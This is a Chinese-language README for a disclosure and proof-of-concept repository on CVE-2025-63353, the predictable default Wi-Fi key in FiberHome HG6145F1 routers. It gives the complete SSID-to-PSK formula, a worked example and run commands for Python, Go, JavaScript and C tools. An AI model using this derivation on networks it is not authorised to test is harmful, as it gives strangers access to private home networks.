FiberHome HG6145F1 GPON ONT 设备中严重的可预测默认 PSK 漏洞(CVE-2025-63353)的多语言 PoC(Python · Go · JS · C)与技术文档。
面向 CVE-2025-63353 的教育性研究工具包和多语言 PoC,这是一个影响 FiberHome HG6145F1 RP4423 GPON ONT 设备的严重可预测默认 PSK 漏洞。
受影响的 FiberHome HG6145F1 设备上的出厂默认 Wi-Fi 预共享密钥是广播 SSID 的确定性函数。攻击者只要观察到来自易受害设备的信标帧,就能在恒定时间内推导出 WPA2 PSK,无需捕获握手包、无需字典、无需 GPU,也无需与客户端交互。
对于广播 SSID 为 fh_<hex_a> 的设备,默认 PSK 为:
PSK = "wlan" + hex(0xFFFFFF XOR hex_a)
示例: fh_a1f9d1 → wlan5e062e
单台设备的有效密钥空间为 1。在所有 HG6145F1 部署中,整个群体范围内的密钥空间至多为 2²⁴ ≈ 1670 万 个 (SSID, PSK) 对;由于 SSID 是广播的,SSID 到 PSK 的映射是一一对应的。
本工作完全基于 Hani Anis Bouzid 的原始漏洞研究与披露:
漏洞发现和首次公开披露的全部功劳归于 Hani Anis Bouzid。本仓库在原始披露的基础上扩展了多语言 PoC 实现和一套精选的技术文档。
.
├── README.md
├── LICENSE
├── docs/
│ ├── vulnerability.md Technical analysis of the algorithm
│ ├── timeline.md Disclosure chronology and vendor response
│ ├── affected-deployments.md Device specifications and known deployments
│ ├── related-research.md Lineage of predictable-PSK vulnerabilities
│ ├── references.md Curated bibliography
│ └── mitigation.md Guidance for users, ISPs, and vendors
└── poc/
├── python/ pure-Python implementation, no dependencies
├── go/ standalone Go binary
├── javascript/ browser-friendly JS / Node.js
└── c/ portable single-file ANSI C (compiles anywhere)
# Python
python3 poc/python/fh-poc.py fh_a1f9d1
# wlan5e062e
# Go
cd poc/go && go run fh-poc.go fh_a1f9d1
# wlan5e062e
# JavaScript (Node)
node poc/javascript/fh-poc.js fh_a1f9d1
# wlan5e062e
# C
cc poc/c/fh-poc.c -o fh-poc && ./fh-poc fh_a1f9d1
# wlan5e062e
四种实现均为独立编写、零依赖,并产生完全相同的输出。请根据你的环境选择使用。
| 字段 | 值 |
|---|---|
| 厂商 | FiberHome (Wuhan FiberHome International Technologies) |
| 型号 | HG6145F1 |
| 固件 | RP4423 |
该漏洞目前仅针对 HG6145F1 RP4423 固件披露。在更广泛的 HG6145 / HG6243 / HG6821 型号系列中的验证仍是一个开放的研究问题。参见 docs/affected-deployments.md。
对于 HG6145F1 的最终用户:
针对 ISP 和供应商的具体指导,请参见 docs/mitigation.md。
本仓库仅用于教育和防御性安全研究目的而发布。此处记录的漏洞已根据 CVE-2025-63353 公开披露,并被 CISA-ADP 评定为严重级别。
在大多数司法管辖区,使用本仓库中的代码针对你并不拥有或未获得明确书面授权测试的网络是非法的,包括摩洛哥关于网络犯罪的第 07-03 号法律、欧盟计算机滥用相关法律框架、美国《计算机欺诈和滥用法》以及其他地区的同等法律。作者对未经授权使用本材料不承担任何责任。
主要来源、相关漏洞和学术文献的完整参考书目维护在 docs/references.md 中。
欢迎通过 Pull Request 向 docs/affected-deployments.md 提交针对其他 FiberHome 型号、固件版本或 ISP 定制变体的已验证测试结果。请包含固件版本、设备标签上的 SSID 前缀以及验证方法。
Ayman Wadi — 安全工程师
| 设备类型 |
| GPON ONT,Wi-Fi 6 (802.11ax),双频 2.4/5 GHz |
| 标准 | ITU-T G.984 Class B+,IEEE 802.11 a/b/g/n/ac/ax |